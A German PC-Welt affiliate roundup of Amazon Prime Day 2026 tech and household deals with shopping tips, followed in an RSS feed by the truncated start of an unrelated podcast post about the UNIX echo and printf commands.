<p>Nur wer eine Amazon-Prime-Mitgliedschaft hat, kann auf die Tiefstpreise am Prime Day zugreifen. Aktuell kostet eine Prime-Mitgliedschaft <strong>8,99 Euro pro Monat</strong>. Man kann die Kosten aber umgehen, indem man einen <strong>Gratis-Probemonat</strong> abschließt und dann rechtzeitig wieder kündigt: <a href="https://www.amazon.de/gp/prime?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Prime-Abo jetzt kostenlos testen</a>.</p>



<h2 class="wp-block-heading">Die besten Angebote am 23. Juni</h2>



<p>Unsere Redaktion empfielt täglich die besten Deals aus den Bereichen Computer, IT, Smartphones, Smart Home und Digital Lifestyle. Am ersten Prime-Day-Tag gibt es Jahresbestpreise für viele Apple-Produkte wie dem Macbook Neo oder dem iPad Air. </p>



<p>Amazon-eigene Geräte wie der smarte Echo-Lautsprecher oder der Fire TV-Stick sind heute <strong>bis zu 65 Prozent günstiger</strong>. Außerdem sind Laptops, Tablets und Zubehör im Angebot. Bei folgenden Angeboten sollten Sie schnell sein, bevor sie vergriffen sind:</p>


<h2>📺 TVs, Streaming &amp; Heimkino</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0CZS4X2S8?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Samsung Crystal UHD 4K TV 98 Zoll</a> für 1.279 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F2JBN3QH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">LG OLED TV 65 Zoll</a> für 1.424 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F457MQCQ?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Xiaomi TV 65 Zoll</a> für 369 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F5BR3WSK?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Samsung Crystal TV 4K 43 Zoll</a> für 245 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F457M449?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Xiaomi TV F Pro 32 Zoll</a> für 149 Euro</li>
<li><a href="https://www.amazon.de/dp/B07XTX5YBD?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Epson 4K-PRO-UHD-Projektor</a> für 1.180 Euro</li>
<li><a href="https://www.amazon.de/dp/B0D22SVP73?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Hisense 3.1 Kanal Soundbar</a> für 114 Euro</li>
<li><a href="https://www.amazon.de/dp/B09BZWZS6S?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Amazon Fire TV Cube</a> für 109,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0CW4HD359?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Amazon Fire TV Stick 4K Max</a> für 46,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DJGCX6Q2?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Amazon Fire TV Stick HD</a> für 19,99 Euro</li>
</ul>
<h2>💻 Laptops, Tablets &amp; Computer</h2>
<h3>Laptops</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B0DVZQ8TJV?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">HP Omen MAX Gaming Laptop</a> für 2.599 Euro</li>
<li><a href="https://www.amazon.de/dp/B0FFMJ72C3?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">ASUS Vivobook 17 Laptop</a> für 549 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F29HYVJZ?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">ASUS Vivobook 16 Laptop</a> für 449 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DSGB8C6M?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Lenovo IdeaPad Slim 3 Laptop</a> für 480 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F9LFB3HM?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">HP Laptop 17,3 Zoll</a> für 329 Euro</li>
<li><a href="https://www.amazon.de/dp/B0GS5S368L?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple 13 Zoll MacBook Neo</a> für 739 Euro</li>
</ul>
<h3>Tablets &amp; Zubehör</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B0DZ76WSYH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple iPad Air 13 Zoll mit M3 Chip</a> für 899 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DZ778WX5?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple iPad Air 11 Zoll mit M3 Chip</a> für 719 Euro</li>
<li><a href="https://www.amazon.de/dp/B0D3J7CKFR?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Pencil Pro</a> für 109 Euro</li>
<li><a href="https://www.amazon.de/dp/B0797FYB3K?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Logitech Advanced Kombi Tastatur</a> für 34 Euro</li>
</ul>
<h3>Monitore &amp; Displays</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B0DCGCWZZF?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Samsung 49 Zoll OLED Gaming Monitor</a> für 799,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F29RH4RY?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Dell 27 Plus Monitor</a> für 273 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F8DWCKQL?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Lenovo 27 Zoll QHD WLED Monitor</a> für 119 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DZD8Y997?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Studio Display</a> für 1.199 Euro</li>
</ul>
<h3>Alles von Apple</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B0DL6LHYQM?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Magic Keyboard</a> für 139 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DL6W3MQX?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Magic Trackpad</a> für 125 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DL6KSW78?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Magic Mouse</a> für 59,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DZ76WSYH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple iPad Air 13 Zoll mit M3 Chip</a> für 899 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DZ778WX5?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple iPad Air 11 Zoll mit M3 Chip</a> für 719 Euro</li>
<li><a href="https://www.amazon.de/dp/B0D3J7CKFR?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Pencil Pro</a> für 109 Euro</li>
<li><a href="https://www.amazon.de/dp/B0GS5S368L?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple 13 Zoll MacBook Neo</a> für 739 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DZD8Y997?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Studio Display</a> für 1.199 Euro</li>
</ul>
<h2>📱 Smartphones, Smartwatches &amp; Wearables</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0FHL3XZNR?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Google Pixel 10 Pro</a> für 699 Euro</li>
<li><a href="https://www.amazon.de/dp/B0GGC2HBBY?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Google Pixel 10a</a> für 449 Euro</li>
<li><a href="https://www.amazon.de/dp/B0FQFLMHSX?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Apple Watch Series 11</a> für 369 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DB61XP8V?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">HUAWEI Watch D2</a> für 303 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F2TT8Q7M?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Sony kabellose NC-Kopfhörer</a> für 349 Euro</li>
<li><a href="https://www.amazon.de/dp/B0D8LHH8CX?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Google Pixel Buds Pro 2</a> für 172 Euro</li>
</ul>
<h2>🎮 Gaming &amp; VR</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B09N5CNS5T?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Meta Quest 3 512 GB</a> für 527 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DBJ5PBLT?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Logitech G Astro A50 Gaming-Headset</a> für 194,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DFKC99VL?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Intel Core Ultra 9 Desktop-Prozessor</a> für 469 Euro</li>
</ul>
<h2>☕ Küche, Kaffee &amp; Haushaltsgeräte</h2>
<h3>Kaffee</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B08CBJCQ39?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Philips Espresso Kaffeevollautomat</a> für 424 Euro</li>
<li><a href="https://www.amazon.de/dp/B0B8JV43LL?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">De’Longhi Siebträgermaschine</a> für 349,90 Euro</li>
<li><a href="https://www.amazon.de/dp/B0FHL3C7KP?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ninja Luxe Premier Kaffeemaschine</a> für 394,99 Euro</li>
</ul>
<h3>Küche</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B0G64WRJGG?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ninja CREAMi Eismaschine</a> für 299,98 Euro</li>
<li><a href="https://www.amazon.de/dp/B0FP2KH5FP?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ninja CREAMi Deluxe Eismaschine</a> für 199,98 Euro</li>
<li><a href="https://www.amazon.de/dp/B0B8DV6CK5?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Philips 7000 PastaMaker</a> für 169 Euro</li>
<li><a href="https://www.amazon.de/dp/B08GHG6CP8?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Tefal Jamie Oliver Pfannenset</a> für 79,79 Euro</li>
</ul>
<h3>Heißluftfritteusen</h3>
<ul>
<li><a href="https://www.amazon.de/dp/B09ZYLM43B?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ninja MAX Dual Zone Heißluftfritteuse</a> für 149 Euro</li>
<li><a href="https://www.amazon.de/dp/B0CZXXVKS7?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ninja Heißluftfritteuse MAX PRO</a> für 89,99 Euro</li>
</ul>
<h2>🏠 Smart Home &amp; Amazon Geräte</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B09B8X9RGM?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Echo Dot</a> für 29,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DKLFHZDH?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Echo Dot Max</a> für 64,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0C2S2J7JP?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Echo Spot</a> für 49,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0B6GKHS2S?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Ring Innenkamera</a> für 24,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0D7QQ9JBT?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Philips Hue LED Lampen 3er Pack</a> für 99,97 Euro</li>
<li><a href="https://www.amazon.de/dp/B00A128S24?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">TP-Link Gigabit Netzwerk Switch</a> für 13,99 Euro</li>
</ul>
<h2>🤖 Saugroboter &amp; Staubsauger</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0GCGVJD71?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">ECOVACS DEEBOT T90</a> für 599 Euro</li>
<li><a href="https://www.amazon.de/dp/B0F53MJY8T?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">dreame L40 Ultra</a> für 449 Euro</li>
<li><a href="https://www.amazon.de/dp/B0H2JP5WVY?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">MOVA E50 Pro Ultra</a> für 429 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DV5RRL9F?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">dreame H12 Nass- und Trockensauger</a> für 178,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0GVP7XY36?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Dyson V8 kabelloser Staubsauger</a> für 279 Euro</li>
</ul>
<h2>🌡️ Klima, Luft &amp; Wohnkomfort</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0CM8P9?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Comfee Mobiles Klimagerät</a> für 190,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0CTMNRY8?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Levoit Standventilator</a> für 109,98 Euro</li>
<li><a href="https://www.amazon.de/dp/B08L73QL1V?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Levoit Luftreiniger</a> für 119,98 Euro</li>
</ul>
<h2>🌳 Garten &amp; Outdoor</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0GD23KKHC?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">MOVA LiDAX 1200 Mähroboter</a> für 894 Euro</li>
<li><a href="https://www.amazon.de/dp/B078GRBYSP?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Einhell Akku-Sense Rasenmäher</a> für 141,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B078H242FN?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Einhell City Akku-Rasenmäher</a> für 99,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0CGX9L9CL?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Bosch Professional Akku Bohrhammer</a> für 174,99 Euro</li>
</ul>
<h2>🛴 E-Mobility &amp; Drohnen</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0B3RWP3ZP?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Segway-Ninebot MAX G2 D E-Scooter</a> für 569 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DWTBMB82?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Xiaomi E-Scooter 4 Lite</a> für 379,99 Euro</li>
<li><a href="https://www.amazon.de/dp/B0FKGSKZ1G?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">DJI Mini 5 Pro Fly Drohne</a> für 949 Euro</li>
</ul>
<h2>🖨️ Büro &amp; Drucker</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B07SJHTWCY?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">HP Color Laser MF-Drucker</a> für 219,99 Euro</li>
</ul>
<h2>💾 Speicher &amp; Datenträger</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B0DN6DK3X4?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">SanDisk Extreme PRO SSD 4 TB</a></li>
<li><a href="https://www.amazon.de/dp/B07VS8QCXC?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">Seagate Portable Drive SSD 5TB</a> für 140 Euro</li>
</ul>
<h2>🔋 Sonstiges</h2>
<ul>
<li><a href="https://www.amazon.de/dp/B01B8R6PF2?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">AA-Alkali-Hochleistungsbatterien</a> für 19,56 Euro</li>
<li><a href="https://www.amazon.de/dp/B0DXLBZF4Q?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="nofollow noopener sponsored">PHILIPS OneBlade elektrischer Rasierer</a> für 34,99 Euro</li>
</ul>


<p></p>



<h2 class="wp-block-heading">Attraktive Preise auch für Amazon-Kunden ohne Prime</h2>



<p>Auch für Amazon-Kunden ohne Prime-Abo gibt es derzeit einige Highlight-Angebote mit Jahresbestpreisen:</p>



<ul class="wp-block-list">
<li><a href="https://www.amazon.de/XIAOMI-Fitness-Tracker-Herzfrequenz-Schlaf%C3%BCberwachung-Dualband-GPS-Jungle-Green/dp/B08N64CBKG?tag=pcwelt.de-21&amp;ascsubtag=rss">Xiaomi Watch S5 für 152,99 statt 240 Euro</a></li>



<li><a href="https://www.amazon.de/Ninja-Eismaschine-Dessertmaschine-Smoothie-Bowls-NC302EU/dp/B0G26N7D9N?tag=pcwelt.de-21&amp;ascsubtag=rss">Ninja CREAMi Eismaschine für 189 statt zuvor 227 Euro</a></li>



<li><a href="https://www.amazon.de/dp/B0GR1B8B3S?tag=pcwelt.de-21&amp;ascsubtag=rss" data-type="link" data-id="https://www.amazon.de/dp/B0GR1B8B3S?tag=pcwelt.de-21&amp;ascsubtag=rss">Apple MacBook Air 15 für 1.439 statt zuvor 1.558 Euro</a></li>



<li><a href="https://www.amazon.de/dp/B0GR1RRJKF?tag=pcwelt.de-21&amp;ascsubtag=rss">Apple MacBook Pro für 2.098 statt 2.169 Euro</a></li>



<li><a href="https://www.amazon.de/dp/B0FQG8MFKP?tag=pcwelt.de-21&amp;ascsubtag=rss">Apple iPhone 17 Pro 256 GB für 1.169 statt 1.227 Euro</a></li>



<li><a href="https://www.amazon.de/Apple-iPhone-Pro-Batterielaufzeit-Kamera-System/dp/B0FQG1TSY1?tag=pcwelt.de-21&amp;ascsubtag=rss">Apple iPhone 17 Pro Max 256 GB für 1.349 statt 1.389 Euro</a></li>



<li><a href="https://www.amazon.de/dp/B0DGHQ1KVY?tag=pcwelt.de-21&amp;ascsubtag=rss">Apple AirPods Max Kopfhörer für 399 statt 439 Euro</a></li>



<li><a href="https://www.amazon.de/Windows-Computer-Ethernet-Business-Heimkino/dp/B0BCNMP3CX?tag=pcwelt.de-21&amp;ascsubtag=rss">Mini PC AMD Ryzen R2544 für 284 statt 299,90 Euro</a></li>
</ul>



<p>Viele weitere Deals finden Sie auf <a href="https://www.pcwelt.de/deals" data-type="link" data-id="https://www.pcwelt.de/deals" target="_blank" rel="noreferrer noopener">unserer Deals-Seite.</a></p>



<p><em>Empfehlung:</em> <a href="https://www.macwelt.de/article/2817043/beste-fruehe-apple-angebote-prime-day-2026.html" target="_blank" rel="noreferrer noopener">Die besten Apple-Angebote zum Prime Day 2026</a></p>



<h2 class="wp-block-heading">Was ist der Amazon Prime Day?</h2>



<p>Der <strong>Amazon Prime Day</strong> ist eine jährlich stattfindende Rabattaktion von Amazon, die sich <strong>exklusiv an Prime-Mitglieder richtet</strong>. Während dieses Zeitraums bietet Amazon stark reduzierte Preise auf eine große Bandbreite von Produkten – von Technik über Haushaltswaren bis hin zu Kleidung. Andere Shops bieten den Prime Day nicht an.</p>



<p>Der Prime Day gehört zu den wichtigsten Online-Shopping-Events des Jahres. Vor allem für Amazon zahlt es sich aus: Jahr für Jahr werden neue Umsatzrekorde gebrochen. Wohl auch deshalb wurde die Dauer von 2 auf inzwischen 4 Tage verlängert. Waren es 2019 noch ca. 5 Milliarden US-Dollar Amazon-Einnahmen weltweit, so schätzt man den Prime Day von 2025 auf ca. 15,3 Milliarden US-Dollar.</p>



<h2 class="wp-block-heading">So verpassen Sie keine Angebote am Prime Day</h2>



<p>In diesem Beitrag werden wir regelmäßig über die besten Angebote während des Prime Day aus den Bereichen Technik, IT, Smartphones, Home Entertainment und Smart Home informieren. Sie können sich den <strong>Artikel als Favorit bookmarken</strong>, um ihn jederzeit aufrufen zu können.</p>



<h3 class="wp-block-heading">Kostenloses Prime-Testabo abschließen</h3>



<p>Wer noch kein Amazon-Prime-Kunde ist, für den lohnt es sich, <strong>jetzt</strong> einen kostenlosen Testmonat auszuprobieren. Denn so kann man ab sofort die exklusiven Prime-Preise erhalten. Wer rechtzeitig kündigt vor Ablauf des Testzeitraums, der zahlt noch nicht mal für das Prime-Abo.</p>



<p><a href="https://www.amazon.de/gp/prime?tag=pcwelt.de-21&amp;ascsubtag=rss">Prime-Abo kostenlos testen</a></p>



<h3 class="wp-block-heading">Angebotsseite bei Amazon checken</h3>



<p>Sogenannte <a href="https://www.amazon.de/deals?ref_=nav_cs_gb&amp;bubble-id=deals-collection-lightning-deals&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Blitzdeals</a> sind nur für kurze Zeit und solange der Vorrat reicht, verfügbar. Deshalb lohnt es sich, regelmäßig die spezielle Amazon-Unterseite des Events zu besuchen:</p>



<p><a href="https://www.amazon.de/primeday?tag=pcwelt.de-21&amp;ascsubtag=rss" target="_blank" rel="noreferrer noopener">Die besten Tagesangebote bei Amazon</a></p>



<p><a href="https://www.amazon.de/deals?ref_=nav_cs_gb&amp;bubble-id=deals-collection-lightning-deals&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Blitzangebote bei Amazon – nur kurz verfügbar</a></p>



<h3 class="wp-block-heading">Rufus – Amazons KI-Einkaufsassistent</h3>



<p>Sie können „<a href="https://www.amazon.de/Rufus/b?node=100898398031&amp;tag=pcwelt.de-21&amp;ascsubtag=rss">Rufus</a>“ aktivieren – Amazons KI-gestützten Einkaufsassistenten, der für Sie persönlich die besten Deals findet.<br>Mehr Infos zu Rufus: <a href="https://www.aboutamazon.com/news/retail/how-to-use-amazon-shopping-ai-assistant" target="_blank" rel="noreferrer noopener">How to use Rufus to check price history, find deals, auto-buy items</a></p>



<h3 class="wp-block-heading">Artikel auf persönliche Merkliste setzen</h3>



<p>Suchen Sie nach Wunschartikeln, die Sie beobachten wollen. Am besten setzen Sie das jeweilige Produkt auf Ihre Merkliste (Button „Auf die Liste“ unterhalb der Preisangabe drücken). So haben Sie Ihre Produkte während des Prime Day besser im Blick und sehen auf Anhieb, falls der Preis gesenkt werden sollte.</p>



<h3 class="wp-block-heading">Personalisierte Empfehlungen ansehen</h3>



<p>Amazon stellt personalisierte Angebote bereit, die sich am individuellen Kundenverhalten orientieren. Filtern Sie dazu auf der Angebotsseite nach „Für dich“.</p>



<p><a href="https://www.amazon.de/deals?tag=pcwelt.de-21&amp;ascsubtag=rss">Zur Angebotsseite</a></p>



<h3 class="wp-block-heading">Bestseller-Liste</h3>



<p>Es empfiehlt sich, immer mal die <a href="https://www.amazon.de/gp/bestsellers?tag=pcwelt.de-21&amp;ascsubtag=rss">Amazon Bestseller-Liste</a> zu durchforsten. Hier werden die meistgekauften Artikel gezeigt. Das Ranking wird regelmäßig angepasst und bildet die tagesaktuelle Nachfrage nach Produkten ab. Spannend ist auch die Amazon-Kategorie „Aufsteiger des Tages“. Interessante Produkte am besten gleich auf die Merkliste setzen.</p>



<h3 class="wp-block-heading"><strong>Mit PC-Welt keine Angebote verpassen</strong></h3>



<p>Abonnieren Sie unseren <a href="https://www.pcwelt.de/newsletter-anmeldung" data-type="link" data-id="https://www.pcwelt.de/newsletter-anmeldung" target="_blank" rel="noreferrer noopener">Schnäppchen-Newsletter</a>. Alle empfehlenswerten Prime Day Angebote aus den Bereichen IT, Tech, Digital Lifestyle und Smarthome finden Sie <strong>kurz vor Start des Prime Day </strong>in unserer Webseiten-Rubrik zum Prime Day:</p>



<p><a href="https://www.pcwelt.de/prime-day" data-type="link" data-id="https://www.pcwelt.de/deals" target="_blank" rel="noreferrer noopener">Die besten Deals am Prime Day – ausgewählt von der PC-Welt Redaktion</a></p>



<p><em><strong>Empfehlung:</strong></em> <a href="https://www.macwelt.de/article/2817043/beste-fruehe-apple-angebote-prime-day-2026.html" target="_blank" rel="noreferrer noopener">Die besten Apple-Angebote am Prime Day 2026</a></p>



<p><strong>Weitere Beiträge:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3132274/alexa-ab-sofort-in-deutschland-verfuegbar-das-kann-sie-besser-als-chatgpt.html" target="_blank" rel="noreferrer noopener">Alexa+ ab sofort in Deutschland verfügbar</a></li>



<li><a href="https://www.aboutamazon.com/news/retail/how-to-use-amazon-shopping-ai-assistant" target="_blank" rel="noreferrer noopener">How to use Rufus to check price history, find deals, auto-buy items</a></li>



<li><a href="https://www.pcwelt.de/article/3076065/amazon-leo-internet-angebot-kommt-nach-deutschland-termin-steht-jetzt-fest.html" data-type="link" data-id="https://www.pcwelt.de/article/3076065/amazon-leo-internet-angebot-kommt-nach-deutschland-termin-steht-jetzt-fest.html" target="_blank" rel="noreferrer noopener">Amazons Internet-Angebot kommt nach Deutschland</a></li>



<li><a href="https://www.pcwelt.de/article/2636917/lenovo-laptop-7606-test-amazon-bestseller.html" data-type="link" data-id="https://www.pcwelt.de/article/2636917/lenovo-laptop-7606-test-amazon-bestseller.html" target="_blank" rel="noreferrer noopener">Amazon-Bestseller im Test: Lenovo Laptop 7606</a></li>



<li><a href="https://www.pcwelt.de/article/2914305/amazon-haul-neuer-online-shop-schnaeppchen-1-euro-bis-20-euro.html" data-type="link" data-id="https://www.pcwelt.de/article/2914305/amazon-haul-neuer-online-shop-schnaeppchen-1-euro-bis-20-euro.html" target="_blank" rel="noreferrer noopener">Neuer Amazon Online-Shop: Tausende Schnäppchen ab 1 Euro bei Amazon Haul</a></li>



<li><a href="https://www.pcwelt.de/article/3130644/reise-urlaub-gadgets-amazon-haul-basics-guenstig.html" data-type="link" data-id="https://www.pcwelt.de/article/3130644/reise-urlaub-gadgets-amazon-haul-basics-guenstig.html" target="_blank" rel="noreferrer noopener">10 praktische Reise-Gadgets, die sich lohnen</a></li>



<li><a href="https://www.pcwelt.de/article/3122095/seagate-portable-drive-5tb-externe-festplatte-im-deal-34-prozent-rabatt-angebot-amazon.html" data-type="link" data-id="https://www.pcwelt.de/article/3122095/seagate-portable-drive-5tb-externe-festplatte-im-deal-34-prozent-rabatt-angebot-amazon.html" target="_blank" rel="noreferrer noopener">Bestseller-Festplatte im Preisrutsch: Seagate-Modell mit 5 TB</a></li>
</ul>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPR4667: UNIX Curio #9 - printf]]></title>
<description><![CDATA[This show has been flagged as Clean by the host.


This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.


The 
echo
 command is very useful—it prints the arguments given to it, followed by a newline chara...]]></description>
<link>https://tsecurity.de/de/3616910/podcasts/hpr4667-unix-curio-9-printf/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616910/podcasts/hpr4667-unix-curio-9-printf/</guid>
<pubDate>Tue, 23 Jun 2026 02:03:29 +0200</pubDate>
<category>🎥 Podcasts</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This show has been flagged as Clean by the host.</p>

<blockquote>
This series is dedicated to exploring little-known—and occasionally useful—trinkets lurking in the dusty corners of UNIX-like operating systems.</blockquote>

<p>
The <code>
echo</code>
 command is very useful—it prints the arguments given to it, followed by a newline character. (The newline is sometimes also called a linefeed character depending on who is writing or speaking, and has the ASCII decimal value 10.) It has many uses, either in a script or interactively on the command line. The <code>
echo</code>
 utility is used to display text, the value of a variable, or the result of a pathname expansion. It can also feed text to another command in a pipeline.</p>

<p>
